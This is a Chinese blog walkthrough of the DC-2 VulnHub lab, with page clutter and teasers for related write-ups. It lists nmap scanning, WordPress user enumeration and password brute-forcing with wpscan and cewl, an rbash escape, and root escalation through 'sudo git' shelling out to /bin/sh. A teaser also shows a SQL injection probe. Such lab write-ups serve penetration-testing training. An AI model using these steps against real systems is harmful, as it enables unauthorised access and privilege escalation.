DC-2通关

最新推荐文章于 2024-09-29 17:17:30 发布
最新推荐文章于 2024-09-29 17:17:30 发布
阅读量733 收藏 13
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C070117/article/details/142575119
版权

DC-2实验报告

第一步:渗透靶场

1、目标:

    目标就是我们搭建的靶场,靶场IP为:XXX.XXX.XXX.XXX/24

2、信息收集:寻找靶机真实IP

nmap -sP 192.168.150.128/24

第二步:收集端口信息和查看端口服务

nmap -A -p- -v 192.168.150.130

 发现开放了80端口,存在web服务   还发现开放了7744端口,开放了ssh服务

第三步:访问web站点

http:// 192.168.150.130

我们可以清楚的看到DC-2访问不了,DC-2这个域名解析失败,我们需要更改hosts文件,添加一个IP域名指向,修改hosts文件,添加靶机IP到域名dc-2的指向

vim /etc/hosts

    

添加完成之后,再次访问,访问成功

 可以很明显的发现这是一个wordpress的站点

第四步:发现flag1在网页下面我们flag

点击flag就可发现flag1

第五步:可以做一个目录扫描

dirb http://dc-2/

发现类似后台地址的链接

打开后我们进入到登录的页面

第六步:用户名枚举

上面我们提到这是一个wordpress的站,我们可以采用专门针对wordpress的工具wpscan工具来进行扫描

 Wpscan一些常用语句:

wpscan --url http://dc-2

wpscan --url http://dc-2 --enumerate t 扫描主题

wpscan --url http://dc-2 --enumerate p 扫描插件

wpscan --url http://dc-2 --enumerate u 枚举用户

扫描wordpress版本

wpscan --url http://dc-2

发现wordpress的版本 4.7.10

再次回到登录页面尝试登录
随即输入用户名密码,提示用户名不存在,应该可以进行用户名枚举

 首先来个用户枚举,再尝试利用枚举到的用户爆破密码

wpscan --url http://dc-2 --enumerate u

枚举出三个用户名分别是admin. Jerry. Tom

第七步:暴力破解出账号密码

在这里可以使用-w参数来将密码字典存储为text文件:cewl http://dc-2/ -w dict.txt   或者 cewl http://dc-2/ > 1.txt

可以使用wpscan进行暴力破解

wpscan --url http://dc-2 --passwords dict.txt

可以爆破出来两个账号

jerry/adipiscing

tom/parturient

可以先用jerry/adipiscing登录此站点

接着可以用tom/parturient登陆此站点

第八步:发现flag2

登录后台之后,我们看到flag2,当前我们使用的是jerry的账号

点进去之后看到flag2提示信息,简单说就是如果wordpress行不通的话就会一个点,我们之前发现有ssh,我们可以去看看ssh

If you can't exploit WordPress and take a shortcut, there is another way.

如果你不能利用WordPress并采取一条捷径,还有另外一种方法。

Hope you found another entry point.

希望你找到了另一个入口。

第九步:在tom的家目录发现flag3

jerry/adipiscing

tom/parturient

    登录ssh

ssh tom@192.168.150.130-p 7744

在tom账号的家目录 发现flag3

然后,尝试rbash绕过详情参考 https://xz.aliyun.com/t/7642(逃逸大全)

查看可以使用的命令

echo $PATH

可以看到cd进不去目录 使用ls直接查看目录信息 

然后使用echo来绕过rbash

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

第十步:可以在jerry的家目录发现flag4

然后我们看到提示信息

Good to see that you've made it this far - but you " re not home yet .

很高兴看到你走了这么远,但你还没回家。

You still need to get the final flag (the only flag that really counts!!! ).

您仍然需要获得最后的标志(唯一真正重要的标志!)

No hints here 一you're on your own now. :- )

这里没有暗示,一,你现在只能靠自己了。*-)

Go on

继续

git outta here!!!!

大致意思就是还没有结束。我们可以猜想一下需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权

因为使用tom用户无权限运行sudo 所以我们可以切换到jerry用户

我们可以看到无需root权限,jerry 可以使用 git

sudo -l  

第十一步:提权

可以查看一下能使用的root权限命令

find / -user root -perm -4000 -print 2>/dev/null

我们可以看到jerry用户也不可以直接sudo su

所以我们直接使用git命令进行提取

sudo git help status

然后我们接着输入!/bin/sh,直接输入就行

提权成功

第十二步:发现final-flag.txt

cd /root

cat final-flag.txt

由此我们可以看到DC-2就完成了,我们这个实验也就成功做完了。

C070117
关注
靶机-DC-2通关全过程
认真走好每一小步
06-18 490
其中,"^USER^"和"^PASS^"将在攻击过程中分别被替换为不同的用户名和密码,"wp-submit=LogIn"表示登录按钮的名称,"testcookie=1"表示要求服务器设置一个测试Cookie,而"S=location"表示如果攻击成功,就重定向到/target/路径下的网页。当一个用户使用rbash作为其默认shell时,该用户将被限制只能执行一些基本的命令,例如cd、ls和echo等,并且不能使用绝大多数的shell功能,如变量赋值、重定向、管道和通配符扩展等。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-15 2309
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-2 通关详解
2401_83566240的博客
09-26 857
值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。为了方便大家记录,或者为将来的研究提供参考,Cewl可以将打印出的字典存储为文件。
DC-2通关详解
li19711289532的博客
09-26 576
值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。为了方便大家记录,或者为将来的研究提供参考,Cewl可以将打印出的字典存储为文件。
DC-2通关教程
2401_83876878的博客
09-26 991
DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。5. 发现不能访问,且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。cewl http://dc-2/ -w dict.txt 或者 cewl http://dc-2/ > 1.txt。wpscan --url http://dc-2 --enumerate u 枚举用户。登录后台之后,我们看到flag2,我用的是jerry的账号。
Dc-2通关教程
2402_84645634的博客
09-29 724
DC-2从环境搭建到通关的教程
DC-2通关讲解
2401_83565841的博客
09-26 910
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。你还需要获取最后的标志(唯一真正重要的标志!翻译:很高兴看到你走到这一步——但你还没有到家。
DC-2通关详细
2401_83566113的博客
09-25 976
此外,WPScan还可以扫描WordPress网站启用的插件和其他功能,是一款开源的命令行工具,专门用于扫描和识别WordPress网站中的漏洞和安全问题。根据flag1可以用暴力破解,我们使用cewl生成字典,Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。DC-2与DC-1非常相似,与最初的DC-1一样是为初学者设计的。
vulnhub通关-2 DC-2(含靶场资源)
Brucye
02-01 991
WPScan是一个开源的网络安全工具,专门用于发现WordPress网站中的安全漏洞。BASH_CMD通常不是一个标准的环境变量。不过,如果你在某些脚本或配置文件中看到BASH_CMD,它可能是一个自定义的环境变量用于存储一个bash命令或者命令的路径。这个变量的具体含义和用途取决于它在脚本或配置中的上下文。命令解释:export 用于添加环境变量,su在/bin目录下,所以添加/bin目录。
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3040
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
(VulnHub靶机通关DC-9
yang1234567898的博客
01-23 805
靶机下载地址:https://download.vulnhub.com/dc/DC-9.zip 主机发现 IP:192.168.43.192 80端口为开放状态,22端口是filtered状态 web渗透 访问80端口的web服务,打开Search界面,输入1' or 1=1 # 存在sql注入 burpsuite抓包然后保存为DC.txt,然后用sqlmap进行爆破 爆库名 python sqlmap.py -r "C:\Users\11989\Desktop\DC.
vulnhub-DC系列通关DC3靶机渗透
qq_35258210的博客
02-15 566
声明:此文章仅供参考学习,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。 目录 明确目标 信息收集 whatweb指纹识别工具 dirb目录扫描工具 joomscan(joomla框架专门的漏洞扫描器) searchsploit Ndya搜索工具 渗透攻击 sqlmap使用 john密码爆破工具 后渗透 提权&flag ----nc瑞士军刀工具 靶机汇总:https://blog.csdn.net/qq_35258210/article/d
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8482
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
非标专机.zip
最新发布
09-30
非标专机.zip
基于Flink流处理引擎的电商平台用户画像系统设计源码
09-30
该项目为基于Flink流处理引擎的电商平台用户画像系统设计源码,共计282个文件,涵盖129个Java类、116个Java源文件、15个属性文件、9个XML配置文件、6个字典文件、4个Kotlin模块文件、2个YAML配置文件以及1个Markdown文档。该系统旨在处理亿级电商数据,生成用户画像,助力平台深入理解用户,实现精准商品推荐和广告投放,提升用户粘性和平台趣味性,具有显著商业价值。详细设计及使用说明请参考README.md文件。
猜数小游戏-c++实现
09-30
实现猜数小游戏
基于asp.net的招聘网站设计与实现.docx
09-30
基于asp.net的招聘网站设计与实现.docx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值